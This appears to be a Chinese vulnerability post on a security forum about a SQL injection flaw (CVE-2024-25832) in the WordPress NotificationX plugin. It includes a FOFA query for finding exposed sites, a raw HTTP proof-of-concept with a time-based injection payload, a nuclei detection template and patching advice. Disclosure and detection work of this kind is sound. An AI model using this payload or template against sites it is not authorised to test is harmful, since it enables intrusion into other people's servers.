WordPress Plugin SQL注入漏洞(CVE-2024-25832)

我是大白   ·   发表于 2024-03-19 15:32:40   ·   漏洞文章

WordPress Plugin SQL注入漏洞(CVE-2024-25832)

漏洞描述

WordPress Plugin是一种用于扩展和增强WordPress网站功能的软件插件。WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。此产品存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器的敏感信息,最终导致服务器失陷。

影响版本

WordPress Plugin NotificationX

产品界面

fofa语法

body="/wp-content/plugins/notificationx"

POC

  1. POST /wp-json/notificationx/v1/analytics HTTP/1.1
  2. Host:
  3. Content-Type: application/json
  4. {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

nuclei验证

  1. id: CVE-2024-25832
  2. info:
  3. name: WordPress Plugin SQL注入漏洞(CVE-2024-25832)
  4. author: nobody
  5. severity: high
  6. description: |
  7. WordPress Plugin 存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器的敏感信息,最终导致服务器失陷。
  8. impact: |
  9. 恶意攻击者可能会利用此漏洞获取服务器的敏感信息
  10. remediation: |
  11. 升级最新版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: body="/wp-content/plugins/notificationx"
  16. tags: CVE-2024-25832,sqli
  17. requests:
  18. - raw:
  19. - |-
  20. @timeout:10s
  21. POST /wp-json/notificationx/v1/analytics HTTP/1.1
  22. Host: {{Hostname}}
  23. Content-Type: application/json
  24. {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
  25. matchers:
  26. - type: dsl
  27. condition: and
  28. dsl:
  29. - "duration>=5"
  30. - status_code==200 && contains_all(body,'\{\"success\":true\}')

修复建议

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问

打赏我,让我更有动力~

1 条回复   |  直到 1个月前 | 473 次浏览

小瑟斯
发表于 1个月前

666

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.